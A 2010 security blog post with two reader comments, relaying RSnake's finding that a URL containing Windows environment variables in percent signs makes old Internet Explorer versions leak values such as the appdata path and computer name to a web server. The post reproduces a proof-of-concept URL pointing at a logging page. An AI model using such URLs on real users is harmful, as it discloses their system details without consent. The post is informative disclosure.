De-cloaking in Internet Explorer

Saturday, February 13, 2010

Fred Williams

D5e39323dd0a7b8534af8a5043a05da2

I ran across a pretty interesting article on RSnake's blog about using a URL to get users to disclose personal information. Here is the original article: 

http://ha.ckers.org/blog/20090810/de-cloaking-in-ie70-via-windows-variables/

I tested this in IE8 and the posting claims it works in IE6 and IE7 as well.  I tested in Firefox with and without NoScripts enabled and it doesn't work.  Yay Firefox!

What you can do is to embed text in a URL surrounded by the normal % % that will grab the actual value out of the system value and post it to the webserver.  Since the values post to the webserver, the people behind the webserver have the ability to view the values.  So, what types of information can be disclosed?  Anything that is contained within your Enviromental variables, for example.

RSnake put up a page that will allow you to try this out:  You will see that the appdata and Computer name should display in the resulting page.

http://ha.ckers.org/log.cgi/rAnd0mcr4p%aPpdAta%2hide%coMpuTeRnaME%th3v4rz

RSnake has asked that if anyone could get this URL to work without requiring a user to type it in their address bar.  Several posters commented that they tried embedding the URL in images, IFrames, etc and couldn't do it.

Pretty interesting stuff. 

Possibly Related Articles:
8248
Privacy Vulnerabilities Webappsec->General
IE Privacy Browser Security
Post Rating I Like this!
6d117b57d55f63febe392e40a478011f
Anthony M. Freed But can Google be trusted with more of our data? They rival any intelligence agency, even surpassing them in their behavioral analysis of the US populace.

The government is restricted in their capacity to collect a lot of this data on US citizens, but they can request it from a third party like Google, or MSN for that matter.
1266098227
D5e39323dd0a7b8534af8a5043a05da2
Fred Williams Re:Chrome Me either. I stick with Firefox. I know it and like it, plus the NoScript plugin is awesome.
1266243918
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.

Most Liked